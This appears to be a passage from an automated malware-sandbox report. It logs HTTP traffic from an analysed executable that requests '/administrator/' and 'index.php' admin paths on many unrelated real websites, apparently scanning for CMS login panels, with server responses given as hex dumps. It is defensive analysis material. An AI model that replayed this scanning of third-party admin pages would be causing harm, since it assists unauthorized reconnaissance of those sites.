                                                                                                                                                                                                    Data Raw: 32 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 5d 4f db 30 14 7d 47 e2 3f 5c 32 a1 6e 84 24 65 bc 6c 6d d2 49 b0 c2 34 c1 8a 44 a5 69 d2 5e 9c d8 49 0c 89 9d d9 4e 53 40 fc f7 dd 7c b8 b4 6c 9a 96 97 da c7 f7 e3 f8 dc e3 86 07 9f 17 e7 cb 1f 37 73 c8 4d 59 cc f6 f7 c2 e1 17 20 cc 19 a1 88 00 7e 61 c9 0c 81 24 27 4a 33 13 39 b5 49 bd 0f 8e 3d d3 e6 a1 60 60 1e 2a 16 39 86 ad 4d 90 68 6d 0f a1 ab 7b dc 57 01 88 25 7d d8 6c de 54 44 19 c1 d4 06 e0 a9 22 25 83 27 1b 8d c9 8c 67 b9 99 c0 c9 78 7c 38 7d 81 1b 4e 4d fe 07 5a 12 95 71 31 81 f1 56 64 45 28 e5 22 db 05 63 a9 28 53 bb 98 ac 4d c1 05 db 05 53 29 8c a7 f9 23 c2 af 18 ac 98 32 3c 21 85 47 0a 9e 61 cf 98 68 d6 e6 6f b5 8e 49 72 9f 29 59 0b 3a 01 a3 88 d0 78 5d 26 cc 26 e2 79 7f cf de 28 38 6a 85 81 27 90 58 37 2d 64 33 c9 39 a5 4c 4c e1 f9 28 e8 83 c2 a0 93 d9 6a de cf 03 e9 61 c5 c8 f9 b6 f8 ee 80 40 ed 22 87 ad 2b ae d8 46 ff 61 70 36 90 0b ca d6 c7 90 ca 02 9b 1c 03 29 0a 9b 77 b9 58 5c 5e cd cf 16 4b 3b b9 ff ce 54 32 96 e6 a5 e1 81 e7 c1 45 57 1f 75 87 6b f4 8d b7 24 19 a4 7c cd 34 68 94 0c 61 8f 6b 5d e3 56 0a 28 65 cc d1 3d 94 ad 78 82 88 e7 fd fd 86 dd c4 a3 3e ca eb 36 53 e0 82 1b 8e 23 68 8b b2 e8 c4 1f 4f a1 24 6b 5e d6 e5 36 54 6b a6 ba 3d 89 31 6a 3c b5 17 5e 71 d6 54 52 99 fe be 61 b0 71 7b d8 ce c2 b2 a0 7c 05 9c 46 ce 60 55 67 16 06 08 d9 53 9d 28 5e 99 6d eb df 91 15 e9 51 ab 23 00 95 49 5d e2 9c fc 46 71 c3 de da a1 b7 ef aa fd 46 10 fe b3 0e 14 44 64 35 c9 70 b8 5f b1 fa 6d d7 d3 c1 34 5b c8 c5 b5 56 49 e4 04 81 66 54 22 d5 7b d4 d8 4f 64 19 a4 aa 6c b7 c1 76 70 83 26 90 8d 5f c8 84 18 2e 85 9f 4b 6d 00 6b ec 04 8d 6e ef 99 78 94 ea e4 e3 76 ea 28 68 ab f9 77 fa 53 cc 52 a9 d8 19 2a 35 17 f4 cb f2 fa 2a 3a 3c 3d af 0e 4f e7 cb 9c 6b 97 ca 92 70 e1 e2 aa 62 a2 7d 7f 2e 3a 9f 35 a4 70 a5 72 73 a2 dd de a5 d4 77 6f 0a 86 2f c7 4d d0 a0 24 31 ae c9 99 4d ae 94 5c 71 7c a6 6e c3 4d ee fe 42 bb b4 6c b5 8f 7d 0e df 5f b4 ad 1c 98 bd 52 21 fc 19 f4 52 ce 46 f0 6e 3a 08 84 2f a7 93 6c 18 da f0 9c aa 59 cb 14 67 d3 32 05 5c 0d 4c 61 60 0a 52 01 32 05 cb 14 7a a6 30 30 05 64 6a 93 2d 53 68 99 c2 0b d3 30 a8 ba 9e 61 30 38 0a 4d d6 fe c9 fe 06 fb 78 b3 30 74 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 2ceT]O0}G?\2n$elmI4Di^INS@|l7sMY ~a$'J39I=``*9Mhm{W%}lTD"%'gx|8}NMZq1VdE("c(SMS)#2<!GahoIr)Y:x]&&y(8j'X7-d39LL(ja@"+Fap6)wX\^K;T2EWuk$|4hak]V(e=x>6S#hO$k^6Tk=1j<^qTRaq{|F`UgS(^mQ#I]FqFDd5p_m4[VIfT"{Odlvp&_.Kmknxv(hwSR*5*:<=Okpb}.:5prswo/M$1M\q|nMBl}_R!RFn:/lYg2\La`R2z00dj-Sh0a08Mx0t0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.566603899 CET290OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: townshipnjr.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://townshipnjr.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.722949982 CET1033INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.14.2
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Last-Modified: Mon, 20 Feb 2023 14:02:48 GMT
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: W/"63f37d88-574"
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 32 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 5d 4f db 30 14 7d 47 e2 3f 5c 32 a1 6e 84 24 65 bc 6c 6d d2 49 b0 c2 34 c1 8a 44 a5 69 d2 5e 9c d8 49 0c 89 9d d9 4e 53 40 fc f7 dd 7c b8 b4 6c 9a 96 97 da c7 f7 e3 f8 dc e3 86 07 9f 17 e7 cb 1f 37 73 c8 4d 59 cc f6 f7 c2 e1 17 20 cc 19 a1 88 00 7e 61 c9 0c 81 24 27 4a 33 13 39 b5 49 bd 0f 8e 3d d3 e6 a1 60 60 1e 2a 16 39 86 ad 4d 90 68 6d 0f a1 ab 7b dc 57 01 88 25 7d d8 6c de 54 44 19 c1 d4 06 e0 a9 22 25 83 27 1b 8d c9 8c 67 b9 99 c0 c9 78 7c 38 7d 81 1b 4e 4d fe 07 5a 12 95 71 31 81 f1 56 64 45 28 e5 22 db 05 63 a9 28 53 bb 98 ac 4d c1 05 db 05 53 29 8c a7 f9 23 c2 af 18 ac 98 32 3c 21 85 47 0a 9e 61 cf 98 68 d6 e6 6f b5 8e 49 72 9f 29 59 0b 3a 01 a3 88 d0 78 5d 26 cc 26 e2 79 7f cf de 28 38 6a 85 81 27 90 58 37 2d 64 33 c9 39 a5 4c 4c e1 f9 28 e8 83 c2 a0 93 d9 6a de cf 03 e9 61 c5 c8 f9 b6 f8 ee 80 40 ed 22 87 ad 2b ae d8 46 ff 61 70 36 90 0b ca d6 c7 90 ca 02 9b 1c 03 29 0a 9b 77 b9 58 5c 5e cd cf 16 4b 3b b9 ff ce 54 32 96 e6 a5 e1 81 e7 c1 45 57 1f 75 87 6b f4 8d b7 24 19 a4 7c cd 34 68 94 0c 61 8f 6b 5d e3 56 0a 28 65 cc d1 3d 94 ad 78 82 88 e7 fd fd 86 dd c4 a3 3e ca eb 36 53 e0 82 1b 8e 23 68 8b b2 e8 c4 1f 4f a1 24 6b 5e d6 e5 36 54 6b a6 ba 3d 89 31 6a 3c b5 17 5e 71 d6 54 52 99 fe be 61 b0 71 7b d8 ce c2 b2 a0 7c 05 9c 46 ce 60 55 67 16 06 08 d9 53 9d 28 5e 99 6d eb df 91 15 e9 51 ab 23 00 95 49 5d e2 9c fc 46 71 c3 de da a1 b7 ef aa fd 46 10 fe b3 0e 14 44 64 35 c9 70 b8 5f b1 fa 6d d7 d3 c1 34 5b c8 c5 b5 56 49 e4 04 81 66 54 22 d5 7b d4 d8 4f 64 19 a4 aa 6c b7 c1 76 70 83 26 90 8d 5f c8 84 18 2e 85 9f 4b 6d 00 6b ec 04 8d 6e ef 99 78 94 ea e4 e3 76 ea 28 68 ab f9 77 fa 53 cc 52 a9 d8 19 2a 35 17 f4 cb f2 fa 2a 3a 3c 3d af 0e 4f e7 cb 9c 6b 97 ca 92 70 e1 e2 aa 62 a2 7d 7f 2e 3a 9f 35 a4 70 a5 72 73 a2 dd de a5 d4 77 6f 0a 86 2f c7 4d d0 a0 24 31 ae c9 99 4d ae 94 5c 71 7c a6 6e c3 4d ee fe 42 bb b4 6c b5 8f 7d 0e df 5f b4 ad 1c 98 bd 52 21 fc 19 f4 52 ce 46 f0 6e 3a 08 84 2f a7 93 6c 18 da f0 9c aa 59 cb 14 67 d3 32 05 5c 0d 4c 61 60 0a 52 01 32 05 cb 14 7a a6 30 30 05 64 6a 93 2d 53 68 99 c2 0b d3 30 a8 ba 9e 61 30 38 0a 4d d6 fe c9 fe 06 fb 78 b3 30 74 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 2ceT]O0}G?\2n$elmI4Di^INS@|l7sMY ~a$'J39I=``*9Mhm{W%}lTD"%'gx|8}NMZq1VdE("c(SMS)#2<!GahoIr)Y:x]&&y(8j'X7-d39LL(ja@"+Fap6)wX\^K;T2EWuk$|4hak]V(e=x>6S#hO$k^6Tk=1j<^qTRaq{|F`UgS(^mQ#I]FqFDd5p_m4[VIfT"{Odlvp&_.Kmknxv(hwSR*5*:<=Okpb}.:5prswo/M$1M\q|nMBl}_R!RFn:/lYg2\La`R2z00dj-Sh0a08Mx0t0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    10192.168.2.45175678.128.62.138806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.135215998 CET232OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: integraledu.hr
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.336216927 CET584INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://integraledu.hr/administrator/
                                                                                                                                                                                                    Content-Length: 309
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 6e 74 65 67 72 61 6c 65 64 75 2e 68 72 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6e 74 65 67 72 61 6c 65 64 75 2e 68 72 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://integraledu.hr/administrator/">here</a>.</p><hr><address>Apache Server at integraledu.hr Port 80</address></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    11192.168.2.451888162.241.224.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.184618950 CET229OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: gasp-ga.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.488620043 CET280INHTTP/1.1 409 Conflict
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Content-Length: 83
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    12192.168.2.452339216.250.121.106806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.239382029 CET230OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: wasserman.us
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.374069929 CET862INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Keep-Alive: timeout=15
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a 10 d4 95 12 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 86 b8 24 97 68 e7 e3 bd dd f7 66 1c 5f 7e 48 df 2f 7f dc df 40 e5 9a fa fa 22 ee ff 20 ae 50 c8 eb 0b 80 b8 41 27 20 af 84 b1 e8 92 a0 75 45 f8 36 f0 09 eb 76 35 82 db ad 30 09 1c 6e 5d 94 5b eb 33 1e 6a 0c 99 96 bb 31 bc 58 09 e3 14 9a 31 50 61 44 83 f0 9b 41 8f 7f 15 52 59 b9 d9 d5 74 fa 72 7e 92 dc 90 74 d5 33 b9 46 98 92 d4 6c 7a da b5 12 52 92 2a 87 52 99 36 12 cd 50 46 b7 ae 26 85 43 a9 42 2b 17 5a fa 85 cf dc 64 8d c6 51 2e ea 50 d4 54 aa 59 26 2c 76 50 a7 17 cb 44 fe 58 1a dd 2a 39 73 46 28 cb ea a0 72 c7 75 7f 8e 44 e8 64 1c 10 4d 33 65 51 eb cd ac 22 29 51 9d 22 c4 91 37 e8 89 87 fc 06 e6 4a 82 bb f4 7b 00 8a bd 48 02 dc ae c8 60 6f db de e9 43 15 29 89 db 31 14 ba 66 96 31 88 ba 3e 34 dd a6 e9 ed 97 9b 77 e9 b2 9f 83 7e 40 ce b7 19 9d 69 b7 a7 ba 0c 43 f8 e8 91 d9 25 f8 ca 23 16 2e 45 09 05 6d d1 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 4d 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a9 69 9b a7 a1 d6 a2 f1 67 91 71 d5 74 7e 78 e7 9a 70 b3 d2 c6 75 cf 8c a3 fd 42 c4 9d 1f 9e 5e d2 1a 48 26 c1 7e c0 7b 31 22 8e fa ac cd 0d ad dc d3 f5 78 10 6b d1 47 fb 2d 91 3a 6f 1b 36 64 b2 31 e4 f0 d5 91 e9 87 05 19 c5 ff c5 81 5a a8 b2 15 25 3b f9 99 d1 17 9e 33 18 0d 42 1d 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 47 d6 7a 92 eb 26 2a 4c d3 1d a3 73 fd 1b 1e 0d bd 99 d4 3a 17 8e b4 9a 54 da 3a 60 d8 b3 8d a3 4f e9 5d ba b8 ef 29 bf 2d ce f1 8c a2 ee 3a 93 07 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ee 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9a 51 15 c5 f7 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 239TMo@WLP@qzCP*c{Z{7]gN$hf_~H/@" PA' uE6v50n][3j1X1PaDARYtr~t3FlzR*R6PF&CB+ZdQ.PTY&,vPDX*9sF(ruDdM3eQ")Q"7J{H`oC)1f1>4w~@iC%#.Eme!9-Fg&qM9GpU~P$9"GJd:Fligqt~xpuB^H&~{1"xkG-:o6d1Z%;3B <|Gz&*Ls:T:`O])-:RFBW+}c_Q0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.546844959 CET284OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: wasserman.us
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://wasserman.us/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.698478937 CET862INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Keep-Alive: timeout=15
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a 10 d4 95 12 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 86 b8 24 97 68 e7 e3 bd dd f7 66 1c 5f 7e 48 df 2f 7f dc df 40 e5 9a fa fa 22 ee ff 20 ae 50 c8 eb 0b 80 b8 41 27 20 af 84 b1 e8 92 a0 75 45 f8 36 f0 09 eb 76 35 82 db ad 30 09 1c 6e 5d 94 5b eb 33 1e 6a 0c 99 96 bb 31 bc 58 09 e3 14 9a 31 50 61 44 83 f0 9b 41 8f 7f 15 52 59 b9 d9 d5 74 fa 72 7e 92 dc 90 74 d5 33 b9 46 98 92 d4 6c 7a da b5 12 52 92 2a 87 52 99 36 12 cd 50 46 b7 ae 26 85 43 a9 42 2b 17 5a fa 85 cf dc 64 8d c6 51 2e ea 50 d4 54 aa 59 26 2c 76 50 a7 17 cb 44 fe 58 1a dd 2a 39 73 46 28 cb ea a0 72 c7 75 7f 8e 44 e8 64 1c 10 4d 33 65 51 eb cd ac 22 29 51 9d 22 c4 91 37 e8 89 87 fc 06 e6 4a 82 bb f4 7b 00 8a bd 48 02 dc ae c8 60 6f db de e9 43 15 29 89 db 31 14 ba 66 96 31 88 ba 3e 34 dd a6 e9 ed 97 9b 77 e9 b2 9f 83 7e 40 ce b7 19 9d 69 b7 a7 ba 0c 43 f8 e8 91 d9 25 f8 ca 23 16 2e 45 09 05 6d d1 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 4d 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a9 69 9b a7 a1 d6 a2 f1 67 91 71 d5 74 7e 78 e7 9a 70 b3 d2 c6 75 cf 8c a3 fd 42 c4 9d 1f 9e 5e d2 1a 48 26 c1 7e c0 7b 31 22 8e fa ac cd 0d ad dc d3 f5 78 10 6b d1 47 fb 2d 91 3a 6f 1b 36 64 b2 31 e4 f0 d5 91 e9 87 05 19 c5 ff c5 81 5a a8 b2 15 25 3b f9 99 d1 17 9e 33 18 0d 42 1d 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 47 d6 7a 92 eb 26 2a 4c d3 1d a3 73 fd 1b 1e 0d bd 99 d4 3a 17 8e b4 9a 54 da 3a 60 d8 b3 8d a3 4f e9 5d ba b8 ef 29 bf 2d ce f1 8c a2 ee 3a 93 07 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ee 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9a 51 15 c5 f7 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 239TMo@WLP@qzCP*c{Z{7]gN$hf_~H/@" PA' uE6v50n][3j1X1PaDARYtr~t3FlzR*R6PF&CB+ZdQ.PTY&,vPDX*9sF(ruDdM3eQ")Q"7J{H`oC)1f1>4w~@iC%#.Eme!9-Fg&qM9GpU~P$9"GJd:Fligqt~xpuB^H&~{1"xkG-:o6d1Z%;3B <|Gz&*Ls:T:`O])-:RFBW+}c_Q0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    13192.168.2.453718104.26.12.245806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.721355915 CET233OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.854559898 CET703INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                    Expires: Sun, 26 Nov 2023 06:59:29 GMT
                                                                                                                                                                                                    Location: https://hightideinc.com/administrator/
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jsp41%2BNbbiGd7kKn%2BUl54BRc2s7VXYHMmRs1aHMYMMlOeoijXSG2K2gMGeH9ZN6Zgm2dkdzEPRxGv8JXFCcRhGBY8b2%2FAIkQyiv39WgqTnS8ynFg2nYS9q00hmTEBLJ0%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 82bfe7dafa801769-IAD
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.896070004 CET242OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.023570061 CET712INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                    Expires: Sun, 26 Nov 2023 06:59:29 GMT
                                                                                                                                                                                                    Location: https://hightideinc.com/administrator/index.php
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hhn3wHBXiiChp7q13y5fEhOeY7gbjuNbzbvLVS3TMULcDtQWLfQa7P6X%2F55506M%2FC5zf9e2dfvt3qY0MerxmRzp5F%2FF7O2XdDNpvhkg7jUbIX6U%2BEnqsV2BOPcw8nIJcYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 82bfe7dc1b101769-IAD
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    14192.168.2.4537333.234.162.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.721661091 CET227OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: t1eng.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.815495968 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                    content-type: text/html
                                                                                                                                                                                                    content-length: 1238
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 